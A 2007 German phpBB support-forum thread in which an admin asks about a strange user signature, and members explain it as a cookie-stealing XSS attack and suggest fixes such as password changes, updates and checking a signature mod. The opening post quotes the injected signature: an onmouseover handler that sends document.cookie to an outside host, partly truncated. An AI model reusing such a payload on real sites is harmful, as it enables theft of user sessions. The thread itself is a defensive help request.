seltsame Signatur

Kiss News · Beitrag von **Kiss News** » 22.02.2007 10:57

Hallo!

Über Nacht hat ein User plötzlich eine seltsame Signatur gehabt:

<pre a='>' onmouseover='document.location="http://lynx5.awardspace.com/smile.php?c ... ent.cookie' b='<pre' >

http://www.mypersonalsite.com/</pre>

Auch der Wohnort und die Flagge (Ländermod) könnte geändert worden sein, da nun dort steht aaaar (oder so ähnlich) als Wohnort und die Flagge von Afghanistan... alles andere stimmt aber, und alles nur bei dem einen User.

Jezt die Frage: könnte es sein, dass da gehackt wurde?

Ich habe die Signatur mal gelöscht, da bei mouse over plötzlich eine andere Seite kommt...

Danke!

Underhill · Beitrag von **Underhill** » 24.02.2007 10:04

Hi,

Kiss News hat geschrieben:Über Nacht hat ein User plötzlich eine seltsame Signatur gehabt:

war das ein neuer User? Wenn es ein bekannter, alter User war ist es unbedingt noetig das er sein PW aendert!

Kiss News hat geschrieben:Jezt die Frage: könnte es sein, dass da gehackt wurde?

Nein "noch" nicht... Das ist erstmal nur ein XSS-Angriff um die Cookies der Benutzer auszulesen die diesen Link besuchen. Wenn du als Admin diesen Link benutzt hast -> Auch besser ALLE Kennwoerter aendern!

Kiss News hat geschrieben:Ich habe die Signatur mal gelöscht, da bei mouse over plötzlich eine andere Seite kommt...Danke!

Ich frage mich nur warum ein Angreifer diese HTML-Sig. bei dir verwenden konnte? Genau diese Sache ist schon ewig lange gefixet worden (2.0.17? - so in der Ecke...) Hast du wirklich alle Updates geamacht? Ich wuerde an deiner Stelle erstmal HTML komplett verbieten - Der kommt sicher wieder...

Gruss
Underhill

Kiss News · Beitrag von **Kiss News** » 24.02.2007 11:17

Danke für die Info. HTML tags sind aber einige NUR für den Moderator zugelassen!!?? Diese User war neu, hat aber auch einiges geschrieben an Board!? Nur belangloses Zeug wie "sorry, I don't understand, my english is not so good"...

Das update 2.017 habe ich leider nicht mehr machen können. Ich habe viele MODs eingebaut, und vom update 2.017 war es mir absolut unmöglich, auch nur irgendwas von dem zu finden, was da gesucht und ersetzt werden sollte...

Ambience · Beitrag von **Ambience** » 24.02.2007 11:28

dann solltest du aber möglichst das aktuelle phpbb saugen und gegebenfall beiträge und mods wieder drüberhauen.

Kiss News · Beitrag von **Kiss News** » 24.02.2007 11:49

das ist nicht möglich, würde ein Jahr dauern. Habe gesehen, dass der User die Signatur jetzt schon wieder drinnen hat, habe ihn mal gelöscht und den Namen verboten.

ist es möglich, auch eine e-mail Adresse zu verbieten? falls ja, wo/wie? Habe da nix gefunden?

Könnte mir bitte jemand sagen, welches update genau ich da machen muß (also welchen Teil von dem 2.017 update), damit das mit der Signatur nicht mehr passieren kann?. Danke!

Beitrag von **cYbercOsmOnauT** » 24.02.2007 12:22

Es sieht eher so aus, als wenn Deine "Admins und Mods dürfen HTML verwenden"-Mod eine Lücke hat, den dieser User/Bot verwendet um entgegen der Restriktion HTML in seine Signatur zu packen. Kann natürlich auch gut sein, dass diese Mod zwar in den Postings kein HTML für Normalos zulässt, diese Prüfung aber in der Signatur nicht durchführt.

Du solltest mal schleunigst diese Modifikation überprüfen. Die "Sinnlospostings" dienen nur dazu die User dazu zu bringen, dass sie die Postings lesen und somit in die Falle tappen.

Grüße,
Tekin

Kiss News · Beitrag von **Kiss News** » 24.02.2007 13:23

Vielen dank für die Info.
das müsste dann dieser Mod sein:

##############################################################
## MOD Title: Signatures control
## MOD Author: -=ET=- < space_et@tiscali.fr > (n/a) http://www.golfexpert.net/phpbb
## MOD Description: This MOD lets admins set general rules to
## fully control what they allow or not for
## signatures. But they can disallow the signature
## or the controls for who they want too.
## MOD Version: 1.2.3
## MOD Compatibility: 2.0.6->2.0.15 (prior release not tested)
##
## Installation Level: Moderate
## Installation Time: 15 Minutes (1mn by EasyMOD of Nuttzy)
## Files To Edit: 9
## posting.php
## viewtopic.php
## admin/admin_board.php
## admin/admin_users.php
## includes/usercp_avatar.php
## includes/usercp_register.php
## templates/subSilver/profile_add_body.tpl
## templates/subSilver/admin/board_config_body.tpl
## templates/subSilver/admin/user_edit_body.tpl
##
## Included Files: 7
## root/admin/sig_reset.php
## root/language/lang_dutch/lang_sig_control.php
## root/language/lang_english/lang_sig_control.php
## root/language/lang_french/lang_sig_control.php
## root/language/lang_german/lang_sig_control.php
## root/language/lang_portuguese/lang_sig_control.php
## root/language/lang_russian/lang_sig_control.php

wo genau könnte der Fehler liegen? Ich könnte die changes/files hier posten, wenn ich genau wüsste, welche...

Ja klar muss der was schreiben, sonst erscheint ja keine Signatur... aber das muss der ja absichtlich gemacht haben, oder? Der Text hat jedenfalls Sinn gehabt, den er geschrieben hat...

P.S.: kann man auch eine bestimmte e-mail Adresse verbieten?

Beitrag von **Dr.Death** » 24.02.2007 13:25

P.S.: kann man auch eine bestimmte e-mail Adresse verbieten?

Ja, über die ACP - Bannliste.

Kiss News · Beitrag von **Kiss News** » 24.02.2007 13:27

Dr.Death hat geschrieben:
P.S.: kann man auch eine bestimmte e-mail Adresse verbieten?
Ja, über die ACP - Bannliste.

wo soll die sein? ich finde nur "Benutzername verbieten"

Beitrag von **Dr.Death** » 24.02.2007 14:02

???

ACP - Benutzer - Bannen

phpBB.de

seltsame Signatur

seltsame Signatur

Re: seltsame Signatur